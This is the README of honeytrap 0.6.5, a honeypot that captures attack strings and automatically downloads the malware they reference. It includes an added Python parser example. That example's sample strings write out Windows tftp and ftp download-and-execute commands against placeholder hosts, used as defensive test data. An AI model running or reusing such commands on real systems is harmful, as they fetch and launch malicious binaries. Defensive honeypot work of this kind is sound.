root/honeytrap/tags/0.6.5/README

Revision 1081, 3.4 kB (checked in by till, 2 years ago)

initial import

README

  Honeytrap is a network security tool written to observe attacks
  against TCP or UDP services. It runs as a daemon and starts server
  processes dynamically on requested ports. A server emulates a
  well-known service by simply sending captured network traffic to
  a connected host.

  Many clients, and particularly attackers, will be fooled and send
  responses to a honeytrap server process. The arriving data is
  assembled into a string and written to a database file. Such a
  string is called an attack string.

  Honeytrap can parse an attack string for commands advising the
  server to download a file from another host. If a download command
  is found, the server tries to retrieve the corresponding file
  automatically. A downloaded file is stored locally with an md5
  checksum in its name. Currently, only ftp and tftp are supported.
  Honeytrap implements its own clients with the aim to behave as
  similarly as possible to Windows systems. HTTP URIs are recognized
  and logged. An http download routine may be added in future
  releases.

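As an added example (not honeytrap's own code), a defender-side parser in Python that runs over constructed attack strings, recognises the tftp and ftp download commands and HTTP URIs described above, and builds the md5-tagged local file name; the regexes, the sample strings and the '<name>-<md5>' naming are assumptions, honeytrap's real parser and naming differ.

```python
import hashlib
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample attack strings (RFC 5737 documentation addresses), in
# the shape a honeytrap server would assemble from received data: a tftp
# GET, an ftp script built with echo, and a bare HTTP URI that is only logged.
SAMPLE_ATTACK_STRINGS = [
    "cmd /c tftp -i 192.0.2.10 GET msupdate.exe & msupdate.exe\r\n",
    "cmd /c echo open 198.51.100.7 2121 > o&echo user x y >> o&"
    "echo get bot.exe >> o&echo bye >> o&ftp -n -s:o&bot.exe\r\n",
    "noise http://www.example.com/dl/tool.exe noise\r\n",
]

@dataclass(frozen=True)
class DownloadCommand:
    proto: str   # "tftp", "ftp" or "http"
    host: str
    port: int
    path: str

TFTP_RE = re.compile(r"tftp\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)", re.I)
FTP_OPEN_RE = re.compile(r"echo\s+open\s+(\S+)(?:\s+(\d+))?", re.I)
FTP_GET_RE = re.compile(r"echo\s+get\s+(\S+)", re.I)
HTTP_RE = re.compile(r"https?://[^\s\"'<>&]+", re.I)

def parse_attack_string(attack: str) -> list[DownloadCommand]:
    """Return every download command recognised in one attack string."""
    found = []
    for host, path in TFTP_RE.findall(attack):
        found.append(DownloadCommand("tftp", host, 69, path))
    opens = FTP_OPEN_RE.findall(attack)
    if opens:                      # assume one ftp script per attack string
        host, port = opens[0]
        for path in FTP_GET_RE.findall(attack):
            found.append(DownloadCommand("ftp", host, int(port or 21), path))
    for uri in HTTP_RE.findall(attack):
        u = urlparse(uri)
        found.append(DownloadCommand("http", u.hostname or "", u.port or 80, u.path))
    return found

def storage_name(original: str, content: bytes) -> str:
    """Local name tagged with the md5 of the content ('<name>-<md5>' is assumed)."""
    return f"{original}-{hashlib.md5(content).hexdigest()}"

if __name__ == "__main__":
    for s in SAMPLE_ATTACK_STRINGS:
        print(s.strip(), "->", parse_attack_string(s))
```
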
  Version 0.5.0 introduces the mirror mode (option '-m'). When
  running in this mode, whenever a connection request is handled,
  honeytrap tries to establish a so-called mirror connection back to
  the remote host, requesting the same port. All data received on
  one of the two connections is copied to the other one. Thus,
  honeytrap is acting as a TCP proxy for a connection of a remote
  host with itself. If no mirror connection can be established,
  honeytrap falls back to normal mode.

  A plugin interface was added in version 0.6.0. Plugins can be
  loaded as dynamic shared objects. Also, honeytrap can now be
  configured via a configuration file. The file is reprocessed when
  a SIGHUP is received, so changes can be made available with zero
  downtime.

  Version 0.6.2 comes with lots of new features. Using the new proxy
  mode, connections can not only be mirrored back to the initiator,
  but also proxied to other systems and other ports. The appropriate
  mode can optionally be configured per TCP port. A new,
  libipq-based connection monitor was introduced (idea stolen from
  the nepenthes honeytrap module).

INSTALLATION

  Installation of honeytrap should be pretty straightforward. Just
  do a './configure --with-<type>-mon && make && make install',
  where '<type>' is the connection monitor type of your choice.
  Please refer to the INSTALL file and to the output of
  './configure --help' for further information.

WARNINGS

  Honeytrap is a low-interaction honeypot and therefore detectable.
  It is written in C and thus potentially vulnerable to buffer
  overflow attacks. Take care. Running in mirror mode is dangerous:
  attacks may be directed to the attacker, appearing to come from
  your system. Use with caution.

  The program needs root privileges, but only for binding server
  processes to well-known ports. Use the -u and -g command line
  options to drop privileges and switch to another user and group
  as early as possible.

THANKS

  Many thanks to Steve and Gary for helping me debug compile errors
  on FreeBSD and OpenBSD, and to lots of others who helped me fix
  bugs.

CONTACT

  If you have problems, questions, ideas or suggestions, please
  contact me at <tillmann.werner@gmx.de>. If you would like to help
  make honeytrap better, you are welcome.